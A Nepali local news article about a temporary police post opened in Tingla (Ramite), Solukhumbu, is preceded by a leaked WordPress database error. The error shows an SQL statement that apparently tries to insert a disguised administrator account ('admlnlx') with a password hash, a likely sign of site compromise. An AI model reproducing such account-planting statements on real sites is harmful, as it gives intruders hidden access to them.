WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Boa4qw2HLErFbfHCVuh7Ut9u0AQTWg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 08:56:08', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लाको सोलुदूधकुण्ड नगरपालिका ११ तिङला (रमिते)मा अस्थायी प्रहरी चौकी स्थापना गरिएको छ ।
प्रहरी सहायक निरीक्षकको कमाण्डमा पाँच जना प्रहरी रहने गरी अस्थायी प्रहरी चौकी स्थापना गरिएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुका प्रहरी निरीक्षक मन्दिप चौहानले जानकारी दिए । मागको आधारमा प्रहरी चौकी स्थापना गरिएपछि स्थानीयहरुले खुसी व्यक्त गरेका छन् ।
यसअघि करिब दुई घण्टा पैदल दुरीमा रहेको पत्ताले प्रहरी चौकीको कार्यक्षेत्रभित्र पर्ने तिङ्लाको रमिते क्षेत्रमा पटक पटक चोरीलगायत विभिन्न अपराधिक घटना हुने गरेका छन् । रमितेमा एउटा बैङ्क समेत सञ्चालनमा रहेकाले सुरक्षाको हिसाबले ढुक्क हुने अवस्था आएको स्थानीयकर्ण कार्कीले बताए ।
तिङ्ला क्षेत्रमा दुई वटा ठूला विद्युत आयोजना समेत निर्माणधीन रहकाले चौकी आवश्यक रहेको स्थानीयको भनाइ छ । समाजमा शान्ति सुव्यवस्था कायम नै पहिलो प्राथमिकतामा रहेको प्रहरी निरीक्षक चौहानले बताए ।